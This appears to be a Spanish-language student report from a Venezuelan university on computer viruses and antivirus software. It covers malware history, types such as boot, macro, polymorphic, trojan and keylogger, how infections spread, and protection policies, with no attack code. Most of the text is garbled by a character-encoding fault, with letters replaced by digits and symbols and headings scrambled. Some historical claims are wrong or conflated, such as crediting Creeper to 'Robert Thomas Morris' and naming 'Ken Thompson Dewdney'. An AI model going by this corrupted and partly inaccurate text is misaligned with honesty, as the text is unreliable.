Está en la página 1de 19

REPBLICA BOLIVARIANA DE VENEZUELA

MINISTERIO DEL PODER POPULAR PARA LA EDUCACIN UNIVERSITARIA


UNIVERSIDAD POLITCNICA TERRITORIAL DEL NORTE DEL TCHIRA
MANUELA SENZ
LA FRA, ESTADO TCHIRA
VIRUS Y ANTIVIRUS
TSU:
Nori!" Ro#"$#
Cri#%o&'r (o#)
C*I*: V+ ,-*./-*0,1
IN2 3 I3&or45%i6"
Pro&* I3!* (o#) 2o375$7
T8M9
LA FRA, NOVIEMBRE DEL 91,:
INTRODUCCIN
El primer virus que atac a una mquina IBM Serie 360 (y reconocido como tal),
ue llamado !reeper, creado en "#$% por &o'ert ()omas Morris* Este pro+rama emit,a
peridicamente en la pantalla el mensa-e. /I0m a creeper*** catc) me i you can1/ (Soy una
enredadera, a+rrenme si pueden)* 2ara eliminar este pro'lema se cre el primer
pro+rama antivirus denominado &eaper (se+adora)* Sin em'ar+o, el t3rmino virus no se
adoptar,a )asta "#45, pero 3stos ya e6ist,an desde antes* Sus inicios ueron en los
la'oratorios de Bell !omputers* (res pro+ramadores desarrollaron un -ue+o llamado !ore
7ars, el cual consist,a en ocupar toda la memoria &8M del equipo contrario en el
menor tiempo posi'le* 9espu3s de "#45, los virus )an tenido una +ran e6pansin, desde los
que atacan los sectores de arranque de dis:ettes )asta los que se ad-untan en un correo
electrnico y se ocultan en un ormato de ima+en comprimida con la e6tensin ;2<*
8 continuacin se presenta una 'reve cronolo+,a de lo que )a sido los or,+enes de
los virus. "#5#. Se da el primer indicio de deinicin de virus* ;o)n =on
>eumann (considerado el ;ulio =erne de la inormtica), e6pone su
/(eor,a y or+ani?acin de un autmata complicado/* >adie pod,a sospec)ar de la
repercusin de dic)o art,culo* "#@#. En los la'oratorios 8(A( Bell, se inventa el -ue+o
/<uerra >uclear/ (!ore 7ars) o +uerra de nBcleos* !onsist,a en una 'atalla entre los
cdi+os de dos pro+ramadores, en la que cada -u+ador desarrolla'a un pro+rama
cuya misin era la de acaparar la m6ima memoria posi'le mediante la reproduccin de s,
mismo* "#$0. >ace /!reeper/ que es diundido por la red 8&28>E(* El virus mostra'a el
mensa-e /SCD !&EE2E&*** E8(&F28ME SI 2GE9ES1/* Ese mismo aHo es creado
su ant,doto. El antivirus &eaper cuya misin era 'uscar y destruir a /!reeper/*
"#$5. El virus &a''it )ac,a una copia de s, mismo y lo situa'a dos veces en la cola
de e-ecucin del 8S2 de IBM lo que causa'a un 'loqueo del sistema* "#40. Ia red
8&28>E( es inectada por un /+usano/ y queda $% )oras uera de servicio* Ia ineccin
ue ori+inada por &o'ert (appan Morris, un -oven estudiante de inormtica de %3 aHos que
se+Bn 3l, todo se produ-o por un accidente* "#43. El -ue+o !ore 7ars, con adeptos en el
MI(, sali a la lu? pB'lica en un discurso de Jen ()ompson 9eKdney que e6plica los
t3rminos de este -ue+o* Ese mismo aHo aparece el concepto virus tal como lo entendemos
)oy* "#4@. 9eKdney intenta enmendar su error pu'licando otro art,culo
/;ue+os de !omputadora virus, +usanos y otras pla+as de la <uerra >uclear atentan
contra la memoria de los ordenadores/*
"#4$. Se da el primer caso de conta+io masivo de computadoras a trav3s del
/MacMa+/ tam'i3n llamado /2eace =irus/ so're computadoras Macintos)* Este virus ue
creado por &ic)ard BrandoK y 9reK 9avison y lo incluyeron en un disco de -ue+os que
repartieron en una reunin de un clu' de usuarios* Gno de los asistentes, Marc !anter,
consultor de 8ldus !orporation, se llev el disco a !)ica+o y contamin la computadora en
la que reali?a'a prue'as con el nuevo sotKare 8ldus Lree)and* El virus contamin el disco
maestro que ue enviado a la empresa a'ricante que comerciali? su producto inectado
por el virus* Se descu're la primera versin del virus /=iernes "3/ en los ordenadores de
la Gniversidad Me'rea de ;erusal3n* "#44. El virus /Brain/ creado por los )ermanos Basit y
8lvi 8m-ad de 2a:istn aparece en Estados Gnidos*
VIRUS DE COMPUTADORA
En inormtica, un virus de computadora es un pro+rama malicioso desarrollado por
pro+ramadores que inecta un sistema para reali?ar al+una accin determinada* 2uede daHar
el sistema de arc)ivos, ro'ar o secuestrar inormacin o )acer copias de si mismo e intentar
esparcirse a otras computadoras utili?ando diversos medios*
Ios virus pueden clasiicarse de acuerdo a su orma de transmisin y de acuerdo al
daHo que ocasionan al computador
CARACTERISTICAS
9ado que una caracter,stica de los virus es el consumo de recursos, los virus
ocasionan pro'lemas tales como. p3rdida de productividad, cortes en los sistemas de
inormacin o daHos a nivel de datos* Gna de las caracter,sticas es la posi'ilidad que tienen
de diseminarse por medio de replicas y copias* Ias redes en la actualidad ayudan a dic)a
propa+acin cuando 3stas no tienen la se+uridad adecuada*
Ctros daHos que los virus producen a los sistemas inormticos son la p3rdida de
inormacin, )oras de parada productiva, tiempo de reinstalacin, etc* May que tener en
cuenta que cada virus plantea una situacin dierente*
METODO DE PROPA2ACIN
E6isten dos +randes clases de conta+io* En la primera, el usuario, en un momento
dado, e-ecuta o acepta de orma inadvertida la instalacin del virus* En la se+unda, el
pro+rama malicioso actBa replicndose a trav3s de las redes* En este caso se )a'la de
+usanos*
En cualquiera de los dos casos, el sistema operativo inectado comien?a a surir una
serie de comportamientos anmalos o imprevistos* 9ic)os comportamientos pueden dar
una pista del pro'lema y permitir la recuperacin del mismo*
9entro de las contaminaciones ms recuentes por interaccin del usuario estn las
si+uientes.
Mensa-es que e-ecutan automticamente pro+ramas (como el pro+rama de correo
que a're directamente un arc)ivo ad-unto)*
In+enier,a social , mensa-es como e-ecute este pro+rama y +ane un premio, o, ms
comBnmente. Ma? % clics y +ana % tonos para mvil +ratis*
Entrada de inormacin en discos de otros usuarios inectados*
Instalacin de sotKare modiicado o de dudosa procedencia*
En el sistema 7indoKs puede darse el caso de que la computadora pueda inectarse
sin nin+Bn tipo de intervencin del usuario (versiones 7indoKs %000, N2 y Server %003)
por virus como Blaster, Sasser y sus variantes por el simple )ec)o de estar la mquina
conectada a una red o a Internet* Este tipo de virus aprovec)an una vulnera'ilidad de
des'ordamiento de 'uer y puertos de red para iniltrarse y conta+iar el equipo, causar
inesta'ilidad en el sistema, mostrar mensa-es de error, reenviarse a otras mquinas
mediante la red local o Internet y )asta reiniciar el sistema, entre otros daHos* En las Bltimas
versiones de 7indoKs %000, N2 y Server %003 se )a corre+ido este pro'lema en su
mayor,a*
METODOS DE PROTECCIN
Ios m3todos para disminuir o reducir los ries+os asociados a los virus pueden ser
los denominados activos o pasivos*
A6%i;o#
8ntivirus. son pro+ramas que tratan de descu'rir las tra?as que )a de-ado un
sotKare malicioso, para detectarlo y eliminarlo, y en al+unos casos contener o parar la
contaminacin* (ratan de tener controlado el sistema mientras unciona parando las
v,as conocidas de ineccin y notiicando al usuario de posi'les incidencias de
se+uridad* 2or e-emplo, al verse que se crea un arc)ivo llamado Win32.EXE.vbs en la
carpeta C:\Windows\%System32%\ en se+undo plano, ve que es comportamiento
sospec)oso, salta y avisa al usuario*
Liltros de ic)eros. consiste en +enerar iltros de ic)eros daHinos si el computador
est conectado a una red* Estos iltros pueden usarse, por e-emplo, en el sistema
de correos o usando t3cnicas de ireKall* En +eneral, este sistema proporciona una
se+uridad donde no se requiere la intervencin del usuario, puede ser muy eica?, y
permitir emplear Bnicamente recursos de orma ms selectiva*
P"#i;o#
Evitar introducir a tu equipo medios de almacenamiento e6tra,'les que consideres
que pudieran estar inectados con al+Bn virus*
>o instalar sotKare /pirata/, pues puede tener dudosa procedencia*
>o a'rir mensa-es provenientes de una direccin electrnica desconocida*
>o aceptar eOmails de desconocidos*
Inormarse y utili?ar sistemas operativos ms se+uros*
>o a'rir documentos sin ase+urarnos del tipo de arc)ivo* 2uede ser un e-ecuta'le o
incorporar macros en su interior*
TIPOS DE VIRUS
FORMA DE TRANSMISIN
Vir<# r#i=3%
!omo su nom're lo indica, esta clase de virus poseen la particularidad de poder
ocultarse en sectores de la memoria &8M del equipo y residir all,, controlando cualquier
operacin de entrada o salida de datos que lleve a ca'o el sistema operativo* Su principal
misin es la de inectar todos los arc)ivos y pro+ramas que puedan ser llamados para su
e-ecucin, ya sea para su copia, 'orrado o toda otra operacin que pueda ser reali?ada con
ellos* Mientras permanecen ocultos en la &8M de nuestra computadora, yacen latentes a la
espera de cualquier evento que )aya sido pro+ramado por su desarrollador para comen?ar
con su ataque* Esta reaccin puede ser desencadenada, por e-emplo, al )a'erse cumplido un
lapso de tiempo en una ec)a u )ora prevista*
Vir<# = "66i>3 =ir6%"
Ia caracter,stica undamental que deine a los virus de tipo de 8ccin 9irecta es
que no necesitan permanecer residentes en la memoria &8M de la computadora, ya que su
m3todo para comen?ar con su ataque es esperar que se cumpla una determinada condicin
para activarse y poder replicarse y reali?ar la tarea para la cual ueron conce'idos* 2ara
poder lo+rar su ineccin, esta clase de virus reali?a una 'Bsqueda de todos los arc)ivos
e6istentes en su directorio* 8dems poseen la particularidad de 'uscar en los directorios
que se listan en la l,nea 28(M de la coni+uracin del sistema* Este tipo de virus poseen la
particularidad de, tras una ineccin de arc)ivos, estos ic)eros pueden ser por completo
restaurados, volviendo al estado anterior a su ineccin*
Vir<# = #o?r#6ri%<r"
Ios virus del tipo de so'reescritura poseen la )a'ilidad de destruir todo o parte del
contenido de un arc)ivo inectado por 3l, ya que cuando un ic)ero es inectado por el
virus, este escri'e datos dentro del mismo, de-ando a este arc)ivo total o parcialmente
inBtil* Gna caracter,stica que deine a este tipo de virus inormtico, es que los arc)ivos no
aumentarn de tamaHo en caso de una ineccin, esto es de'ido a que el virus oculta su
cdi+o reempla?ando parte del cdi+o propio del arc)ivo inectado* Este es uno de los virus
ms per-udiciales que circulan en la actualidad* Iamenta'lemente una de las pocas ormas
que e6isten de erradicar el virus, es eliminado el arc)ivo inectado, con la consi+uiente
p3rdida de los datos escritos en 3l*
Vir<# = %i@o = ?oo% o "rr"3A<
El sector de arranque o tam'i3n conocido por MB& (Master Boot &ecord), es una
?ona del disco r,+ido donde reside el pro+rama de inicio del sistema operativo* Ia clase de
virus que ataca el sector de arranque no inectarn arc)ivos, sino que su misin principal es
replicarse en cualquier otro disco r,+ido que se encuentre a su alcance* Se trata de un virus
del tipo residente, ya que cuando el mismo se encuentra activo en la memoria, uno de los
aspectos ms importantes al momento de determinar su e6istencia, es el notorio
decaimiento de las ciras que arro-a cualquier conteo de la memoria li're del sistema* Sin
em'ar+o, el cdi+o del virus no incorpora nin+una clase de rutina per-udicial, salvo la
propia replicacin del mismo*
Vir<# = 4"6ro
El principal motivo de creacin de estos virus es la de poder inectar a todos
aquellos arc)ivos que ten+an la posi'ilidad de e-ecutar macros* Estas macros son pequeHas
aplicaciones destinadas a acilitar la tarea del usuario mediante la automati?acin de ciertas
y comple-as operaciones que de otro modo ser,an demasiado tediosas de llevar a ca'o*
Estos microOpro+ramas, al contener cdi+o e-ecuta'le, tam'i3n son propensos, o'viamente,
a contener virus* El m3todo de ineccin del cual )acen uso los virus de esta ,ndole es
simple, una ve? car+ado el arc)ivo, estas macros se car+arn en memoria y el cdi+o se
e-ecutar produci3ndose de esta orma la ineccin* !a'e destacar que +ran parte de estas
aplicaciones cuentan con una proteccin incorporada para esta clase de amena?as, si 'ien
no siempre es eectiva* 8dems lo cierto es que la mayor,a de estos virus no puede atacar a
todas las aplicaciones por i+ual, de'ido a que su cdi+o est escrito para atacar a un
pro+rama en particular* Ios e-emplos ms importantes de esta clase de ic)eros son los
documentos +enerados por Microsot 7ord, cuya e6tensin es doc, como as, tam'i3n los
arc)ivos de Microsot E6cel, cuyas )o-as de clculo poseen la e6tensin 6ls, los ic)eros de
8ccess con e6tensin M9B, las presentaciones de Microsot 2oKer2oint, y al+unos
ic)eros reali?ados por !orel9raK entre otros*
Vir<# = 3$"6#
Este tipo de virus tiene la acultad de modiicar las direcciones espec,icas de
u'icacin de pro+ramas y arc)ivos para comen?ar su ineccin, es decir, los lu+ares en
donde el sistema operativo 'uscar estos pro+ramas o arc)ivos para su e-ecucin* El
m3todo de ineccin utili?ado por este virus, como mencionamos, es alterar la u'icacin de
un determinado pro+rama o arc)ivo* 8l momento de que el sistema operativo o el usuario
del mismo necesite e-ecutar este pro+rama o ic)ero inectado, lo que en realidad sucede es
la e-ecucin del cdi+o malicioso que porta el virus, produci3ndose de este modo la
ineccin de cualquier pro+rama con e6tensin e6e o com* !a'e destacar que cuando se
produce una ineccin por virus de tipo de enlace, resulta prcticamente imposi'le la
locali?acin de los pro+ramas que )an sido reempla?ados por el accionar de los mismos*
Vir<# = 36ri@6i>3
Ios desarrolladores de esta peculiar clase de virus utili?an el m3todo de cirado por
encriptacin para lo+rar el o'-etivo de no ser descu'iertos por las e6ploraciones que
reali?an las aplicaciones antivirus* Si 'ien no se trata estrictamente de un tipo de virus, es
una denominacin que se le otor+a a cierta clase de t3cnica utili?ada para el ocultamiento
de los mismos* Esta denominacin tam'i3n es e6tensi'le a virus de otras cate+or,as, tales
como los virus de tipo polirmico* Ios virus de tipo de encriptacin, tienen la capacidad
de autoencriptarse, ocultndose de este modo a los intentos de los pro+ramas antivirus
cuando reali?an sus rutinas de escaneo del sistema* 2ara cumplir con la misin
encomendada por su pro+ramador, el virus de encriptacin se autodesencriptar y una ve?
inali?ada su tarea volver a su anterior estado, es decir, se encriptar a s, mismo* 2ara
acometer con su ineccin, los virus encriptados incorporan a su cdi+o los al+oritmos
necesarios para su cirado y descirado, de'ido a que el cirado es una t3cnica que necesita
de una clave para encriptarlo y desencriptarlo, la cual o'viamente no posee el usuario que
)a sido inectado* !a'e destacar que esta clase de virus slo pueden ser descu'iertos por los
pro+ramas antivirus cuando se encuentran en e-ecucin*
Vir<# @o$i4>r&i6o#
Ios virus polimricos, una t3cnica muy soisticada y que demanda muc)o
conocimiento por parte del desarrollador, son aquellos que poseen la )a'ilidad de
encriptarse de un modo dierente y varia'le con cada nueva ineccin que reali?an* Su
principal caracter,stica consiste en que con cada replicacin, utili?an dierentes claves y
al+oritmos de encriptacin, de modo que las cadenas que componen su cdi+o, una especie
de irma para los sistemas antivirus, var,an de tal orma que nunca lo+rarn concordar con
las irmas e6istentes en las 'ases de datos que utili?an estos antivirus para su deteccin*
9e'ido a la utili?acin de esta complicada t3cnica, estos virus son capaces de +enerar +ran
cantidad de copias de s, mismos, pero nunca i+uales*
Vir<# = %i@o 4<$%i@"r%i%
2odemos considerar, de'ido a los estudios y tra'a-os reali?ados por e6pertos en
inormtica en todo el mundo, que este tipo de virus es actualmente uno de los ms
per-udiciales que cualquier usuario, tanto e6perto como novato, puede encontrar* Estos
virus de'en su peli+rosidad al )ec)o de que pueden reali?ar, mediante la utili?acin
con-unta de dierentes t3cnicas y m3todos de ataque, mBltiples y variadas inecciones* El
o'-etivo principal de su e6istencia, es la posi'ilidad de destruir con su cdi+o a todos
aquellos arc)ivos y pro+ramas e-ecuta'les que ten+a la posi'ilidad de inectar* Entre los
'lancos preeridos de esta clase de virus podemos citar arc)ivos, pro+ramas y aplicaciones,
las macros que incorporan suites de oimtica como Microsot Cice, discos r,+idos,
unidades de almacenamiento e6tra,'les tales como dis:ettes, pendrives y memorias de todo
tipo* !a'e destacar que tras el ataque de un virus de tipo multipartite, los datos que
contienen los elementos inectados sern imposi'les de recuperar*
TIPO DE DABO
Vir<# = Boo%
Gno de los primeros tipos de virus conocido, el virus de 'oot inecta la particin de
iniciali?acin del sistema operativo* El virus se activa cuando la computadora es encendida
y el sistema operativo se car+a*
Ti4 Bo4? o Bo4?" = Ti4@o
Ios virus del tipo P'om'a de tiempoQ son pro+ramados para que se activen en
determinados momentos, deinido por su creador* Gna ve? inectado un determinado
sistema, el virus solamente se activar y causar al+Bn tipo de daHo el d,a o el instante
previamente deinido* 8l+unos virus se )icieron amosos, como el P=iernes "3R y el
PMic)elan+eloQ*
Lo4?ri6#, Cor4 o !<#"3o#
!on el inter3s de )acer un virus pueda esparcirse de la orma ms amplia posi'le,
sus creadores a veces, de-aron de lado el )ec)o de daHar el sistema de los usuarios
inectados y pasaron a pro+ramar sus virus de orma que slo se repliquen, sin el o'-etivo
de causar +raves daHos al sistema* 9e esta orma, sus autores tratan de )acer sus creaciones
ms conocidas en internet* Este tipo de virus pas a ser llamado +usano o Korm* Son cada
ve? ms perectos, )ay una versin que al atacar la computadora, no slo se replica, sino
que tam'i3n se propa+a por internet enviandose a los eOmail que estn re+istrados en el
cliente de eOmail, inectando las computadoras que a'ran aquel eOmail, reiniciando el ciclo*
TroD"3o# o 6"?"$$o# = TroD"
!iertos virus traen en su interior un cdi+o aparte, que le permite a una persona
acceder a la computadora inectada o recolectar datos y enviarlos por Internet a un
desconocido, sin que el usuario se de cuenta de esto* Estos cdi+os son denominados
(royanos o ca'allos de (roya* Inicialmente, los ca'allos de (roya permit,an que la
computadora inectada pudiera reci'ir comandos e6ternos, sin el conocimiento del usuario*
9e esta orma el invasor podr,a leer, copiar, 'orrar y alterar datos del sistema* 8ctualmente
los ca'allos de (roya 'uscan ro'ar datos conidenciales del usuario, como contraseHas
'ancarias* Ios virus eran en el pasado, los mayores responsa'les por la instalacin de los
ca'allos de (roya, como parte de su accin, pues ellos no tienen la capacidad de replicarse*
8ctualmente, los ca'allos de (roya ya no lle+an e6clusivamente transportados por virus,
a)ora son instalados cuando el usuario 'a-a un arc)ivo de Internet y lo e-ecuta* 2rctica
eica? de'ido a la enorme cantidad de eOmails raudulentos que lle+an a los 'u?ones de los
usuarios* (ales eOmails contienen una direccin en la Ke' para que la v,ctima 'a-e, sin
sa'er, el ca'allo de (roya, en ve? del arc)ivo que el mensa-e dice que es* Esta prctica se
denomina p)is)in+, e6presin derivada del ver'o to is), PpescarQ en in+l3s* 8ctualmente,
la mayor,a de los ca'allos de (roya simulan Ke's 'ancarias, PpescandoQ la contraseHa
tecleada por los usuarios de las computadoras inectadas* E6isten distintas ormas para
sa'er si ests inectado con un troyano y cmo eliminarlo de tu 2!*
HiE"6Fr#
Ios )i-ac:ers son pro+ramas o scripts que PsecuestranQ nave+adores de Internet,
principalmente el Internet E6plorer* !uando eso pasa, el )i-ac:er altera la p+ina inicial del
nave+ador e impide al usuario cam'iarla, muestra pu'licidad en popOups o ventanas nuevas,
instala 'arras de )erramientas en el nave+ador y pueden impedir el acceso a determinadas
Ke's (como Ke's de sotKare antiv,rus, por e-emplo)*
GD$o!!r
El JeyIo++er es una de las especies de virus e6istentes, el si+niicado de los
t3rminos en in+l3s que ms se adapta al conte6to ser,a. !apturador de teclas* Iue+o que son
e-ecutados, normalmente los :eylo++ers quedan escondidos en el sistema operativo, de
manera que la v,ctima no tiene como sa'er que est siendo monitori?ada* 8ctualmente los
:eylo++ers son desarrollados para medios il,citos, como por e-emplo ro'o de contraseHas
'ancarias* Son utili?ados tam'i3n por usuarios con un poco ms de conocimiento para
poder o'tener contraseHas personales, como de cuentas de email, MS>, entre otros* E6isten
tipos de :eylo++ers que capturan la pantalla de la v,ctima, de manera de sa'er, quien
implant el :eylo++er, lo que la persona est )aciendo en la computadora* !mo los
:eylo++er nos ro'an la inormacinS !mo cuidarseS
Zo4?i
El estado ?om'ie en una computadora ocurre cuando es inectada y est siendo
controlada por terceros* 2ueden usarlo para diseminar virus , :eylo++ers, y procedimientos
invasivos en +eneral* Gsualmente esta situacin ocurre porque la computadora tiene su
LireKall yTo sistema operativo desatuali?ado* Se+Bn estudios, una computadora que est en
internet en esas condiciones tiene casi un @0U de c)ances de convertirse en una mquina
?om'ie, pasando a depender de quien la est controlando, casi siempre con ines criminales*
Vir<# = M"6ro
Ios virus de macro (o macro virus) vinculan sus acciones a modelos de documentos
y a otros arc)ivos de modo que, cuando una aplicacin car+a el arc)ivo y e-ecuta las
instrucciones contenidas en el arc)ivo, las primeras instrucciones e-ecutadas sern las del
virus*
Ios virus de macro son parecidos a otros virus en varios aspectos. son cdi+os
escritos para que, 'a-o ciertas condiciones, este cdi+o se Preprodu?caQ, )aciendo una copia
de 3l mismo* !omo otros virus, pueden ser desarrollados para causar daHos, presentar un
mensa-e o )acer cualquier cosa que un pro+rama pueda )acer*
N<;o# 4=io#
Muc)o se )a'la de prevencin contra virus inormticos en computadoras
personales, la amosa 2!, pero poca +ente sa'e que con la evolucin )oy e6isten muc)os
dispositivos que tienen acceso a internet, como tel3onos celulares, )and)elds, tel3onos
=CI2, etc* May virus que pueden estar atacando y per-udicando la perormance de estos
dispositivos en cuestin* 2or el momento son casos aislados, pero el temor entre los
especialistas en se+uridad di+ital es que con la propa+acin de una inmensa cantidad de
dispositivos con acceso a internet, los )ac:ers se van a empe?ar a interesar cada ve? ms
por atacar a estos nuevos medios de acceso a internet* (am'i3n se vio recientemente que
los virus pueden lle+ar a productos electrnicos deectuosos, como pas recientemente con
i2C9S de 8pple, que tra,an un PinoensivoQ virus (cualquier antiv,rus lo elimina, antes de
que 3l elimine al+unos arc)ivos contenidos en el i2C9)*
ACCIONES DE LOS VIRUS
8l+unas de las acciones de al+unos virus son.
Gnirse a un pro+rama instalado en el computador permitiendo su propa+acin*
Mostrar en la pantalla mensa-es o im+enes )umor,sticas, +eneralmente molestas*
&alenti?ar o 'loquear el computador*
9estruir la inormacin almacenada en el disco, en al+unos casos vital para el
sistema, que impedir el uncionamiento del equipo*
&educir el espacio en el disco*
Molestar al usuario cerrando ventanas, moviendo el ratn*
ANTIVIRUS
En inormtica los "3%i;ir<# son pro+ramas cuyo o'-etivo es detectar yTo
eliminar virus inormticos* >acieron durante la d3cada de "#40*
!on el transcurso del tiempo, la aparicin de sistemas operativos ms avan?ados
e Internet, )a )ec)o que los antivirus )ayan evolucionado )acia pro+ramas ms avan?ados
que no slo 'uscan detectar virus inormticos, sino 'loquearlos, desinectar arc)ivos y
prevenir una ineccin de los mismos, y actualmente ya son capaces de reconocer otros
tipos de malKare, como spyKare,+usanos, troyanos, root:its, etc*
METODO DE CONTA2IO
E6isten dos +randes +rupos de propa+acin. los virus cuya instalacin el usuario en
un momento dado e-ecuta o acepta de orma inadvertida, o los +usanos, con los que el
pro+rama malicioso actBa replicndose a trav3s de las redes*
En cualquiera de los dos casos, el sistema operativo inectado comien?a a surir una
serie de comportamientos anmalos o no previstos* 9ic)os comportamientos son los que
dan la tra?a del pro'lema y tienen que permitir la recuperacin del mismo*
9entro de las contaminaciones ms recuentes por interaccin del usuario estn las
si+uientes.
Mensa-es que e-ecutan automticamente pro+ramas (como el pro+rama de correo
que a're directamente un arc)ivo ad-unto)*
In+enier,a social, mensa-es como. VE-ecute este pro+rama y +ane un premioW*
Entrada de inormacin en discos de otros usuarios inectados*
Instalacin de sotKare que pueda contener uno o varios pro+ramas maliciosos*
Gnidades e6tra,'les de almacenamiento (GSB)*
SE2URIDAD Y METODOS DE PROTECCION
Ios m3todos para contener o reducir los ries+os asociados a los virus pueden ser los
denominados activos o pasivos*
Ti@o# = ;"6<3"#
S>$o =%66i>3. son vacunas que slo actuali?an arc)ivos inectados, sin em'ar+o,
no pueden eliminarlos o desinectarlos*
D%66i>3 D =#i3&66i>3. son vacunas que detectan arc)ivos inectados y que
pueden desinectarlos*
D%66i>3 D "?or%o = $" "66i>3. son vacunas que detectan arc)ivos inectados y
detienen las acciones que causa el virus*
Co4@"r"6i>3 @or &ir4"#. son vacunas que comparan las irmas de arc)ivos
sospec)osos para sa'er si estn inectados*
Co4@"r"6i>3 = &ir4"# = "r6'i;o. son vacunas que comparan las irmas de los
atri'utos +uardados en tu equipo*
Por 4)%o=o# '<rH#%i6o#. son vacunas que usan m3todos )eur,sticos para comparar
arc)ivos*
I3;o6"=o @or $ <#<"rio. son vacunas que se activan instantneamente con el
usuario*
I3;o6"=o @or $" "6%i;i="= =$ #i#%4". son vacunas que se activan
instantneamente por la actividad del sistema operativo*
Co@i"# = #!<ri="= I@"#i;oJ
Mantener una pol,tica de copias de se+uridad +aranti?a la recuperacin de los datos
y la respuesta cuando nada de lo anterior )a uncionado*
8simismo, las empresas de'er,an disponer de un plan y detalle de todo el sotKare
instalado para tener un plan de contin+encia en caso de pro'lemas*
PLANIFICACION
Ia planiicacin consiste en tener preparado un plan de contin+encia en caso de que
una emer+encia de virus se produ?ca, as, como disponer al personal de la ormacin
adecuada para reducir al m6imo las acciones que puedan presentar cualquier tipo de
ries+o* !ada antivirus puede planear la deensa de una manera, es decir, un antivirus puede
)acer un escaneado completo, rpido o de vulnera'ilidad se+Bn eli-a el usuario*
Co3#i=r"6io3# = #o&%C"r
El sotKare es otro de los elementos clave en la parte de planiicacin* Se de'er,a
tener en cuenta la si+uiente lista de compro'aciones para tu se+uridad.
1. (ener el sotKare imprescindi'le para el uncionamiento de la actividad, nunca
menos pero tampoco ms* (ener controlado al personal en cuanto a la instalacin
de sotKare es una medida que va impl,cita* 8simismo tener controlado el sotKare
ase+ura la calidad de la procedencia del mismo (no de'er,a permitirse sotKare
pirata o sin +arant,as)* En todo caso un inventario de sotKare proporciona un
m3todo correcto de ase+urar la reinstalacin en caso de desastre*
%* 9isponer del sotKare de se+uridad adecuado* !ada actividad, orma de tra'a-o y
m3todos de cone6in a Internet requieren una medida dierente de apro6imacin al
pro'lema* En +eneral, las soluciones dom3sticas, donde Bnicamente )ay un equipo
e6puesto, no son las mismas que las soluciones empresariales*
3* M3todos de instalacin rpidos* 2ara permitir la reinstalacin rpida en caso de
contin+encia*
5* 8se+urar licencias* 9eterminados sotKares imponen m3todos de instalacin de una
ve?, que diicultan la reinstalacin rpida de la red* 9ic)os pro+ramas no siempre
tienen alternativas pero )a de 'uscarse con el a'ricante m3todos rpidos de
instalacin*
@* Buscar alternativas ms se+uras* E6iste sotKare que es amoso por la cantidad de
a+u-eros de se+uridad que introduce* Es imprescindi'le conocer si se puede
encontrar una alternativa que proporcione i+uales uncionalidades pero permitiendo
una se+uridad e6tra*
Co3#i=r"6io3# = $" r=
9isponer de una visin clara del uncionamiento de la red permite poner puntos de
veriicacin de iltrado y deteccin a), donde la incidencia es ms claramente identiica'le*
Sin perder de vista otros puntos de accin es conveniente.
"* Mantener al m6imo el nBmero de recursos de red en modo de slo lectura* 9e esta
orma se impide que computadoras inectadas los propa+uen*
2. !entrali?ar los datos* 9e orma que detectores de virus en modo 'atc) puedan
tra'a-ar durante la noc)e*
3. &eali?ar iltrados de ireKall de red* Eliminar los pro+ramas que comparten datos,
como pueden ser los 2%2X Mantener esta pol,tica de orma ri+urosa, y con el
consentimiento de la +erencia*
5* &educir los permisos de los usuarios al m,nimo, de modo que slo permitan el
tra'a-o diario*
@* !ontrolar y monitori?ar el acceso a Internet* 2ara poder detectar en ases de
recuperacin cmo se )a introducido el virus, y as, determinar los pasos a se+uir*
For4"6i>3: D$ <#<"rio
Esta es la primera 'arrera de proteccin de la red*
A3%i;ir<#
Es conveniente disponer de una licencia activa de antivirus* 9ic)a licencia se
emplear para la +eneracin de discos de recuperacin y emer+encia* Sin em'ar+o, no se
recomienda en una red el uso continuo de antivirus*
El motivo radica en la cantidad de recursos que dic)os pro+ramas o'tienen del
sistema, reduciendo el valor de las inversiones en )ardKare reali?adas* 8unque si los
recursos son suicientes, este e6tra de se+uridad puede ser muy Btil*
Sin em'ar+o, los iltros de correos con detectores de virus son imprescindi'les, ya
que de esta orma se ase+urar una reduccin importante de elecciones de usuarios no
entrenados que pueden poner en ries+o la red*
Ios virus ms comunes son los troyanos y +usanos, los cuales ocultan tu
inormacin, creando 8ccesos 9irectos*
FirC"$$#
Liltrar contenidos y puntos de acceso* Eliminar pro+ramas que no est3n
relacionados con la actividad* (ener monitori?ado los accesos de los usuarios a la red,
permite asimismo reducir la instalacin de sotKare que no es necesario o que puede
+enerar ries+o para la continuidad del ne+ocio* Su si+niicado es 'arrera de ue+o y no
permite que otra persona no autori?ada ten+a acceso desde otro equipo al tuyo*
R4@$"7o = #o&%C"r
Ios puntos de entrada en la red la mayor,a de las veces son el correo, las p+inas
7EB, y la entrada de ic)eros desde discos, o de computadoras que no estn en la empresa
(porttiles)
Muc)as de estas computadoras emplean pro+ramas que pueden ser reempla?ados
por alternativas ms se+uras*
Es conveniente llevar un se+uimiento de cmo distri'uyen 'ancos, y e6ternos el
sotKare, valorar su utilidad*
C3%r"$i7"6i>3 D ?"6F<@
Ia centrali?acin de recursos y +aranti?ar el 'ac:up de los datos es otra de las
pautas undamentales en la pol,tica de se+uridad recomendada*
Ia +eneracin de inventarios de sotKare, centrali?acin del mismo y la capacidad
de +enerar instalaciones rpidas proporcionan m3todos adicionales de se+uridad*
Es importante tener locali?ado dnde se sitBa la inormacin en la empresa* 9e esta
orma podemos reali?ar las copias de se+uridad de orma adecuada*
!ontrol o separacin de la inormtica mvil, dado que esta est ms e6puesta a las
contin+encias de virus*
E4@$o = #i#%4"# o@r"%i;o# 45# #!<ro#
2ara servir ic)eros no es conveniente disponer de los mismos sistemas operativos
que se emplean dentro de las estaciones de tra'a-o, ya que toda la red en este caso est
e6puesta a los mismos retos* Gna orma de prevenir pro'lemas es disponer de sistemas
operativos con arquitecturas dierentes, que permitan +aranti?ar la continuidad de ne+ocio*
T4"# "6r6" = $" #!<ri="=
E6isten ideas instaladas por parte de las empresas de antivirus parte en la cultura
popular que no ayudan a mantener la se+uridad de los sistemas de inormacin*
Mi #i#%4" 3o # i4@or%"3% @"r" <3 6r"6Fr* Este tema se 'asa en la idea de que
no introducir passKords se+uras en una empresa no entraHa ries+os pues YZui3n va a
querer o'tener inormacin m,aS Sin em'ar+o dado que los m3todos de conta+io se
reali?an por medio de pro+ramas automticos, desde unas mquinas a otras, estos no
distin+uen 'uenos de malos, interesantes de no interesantes*** 2or tanto a'rir sistemas y
de-arlos sin claves es acilitar la vida a los virus*
E#%oD @ro%!i=o @<# 3o "?ro "r6'i;o# A< 3o 6o3o76o* Esto es also, pues
e6isten mBltiples ormas de conta+io, adems los pro+ramas reali?an acciones sin la
supervisin del usuario poniendo en ries+o los sistemas*
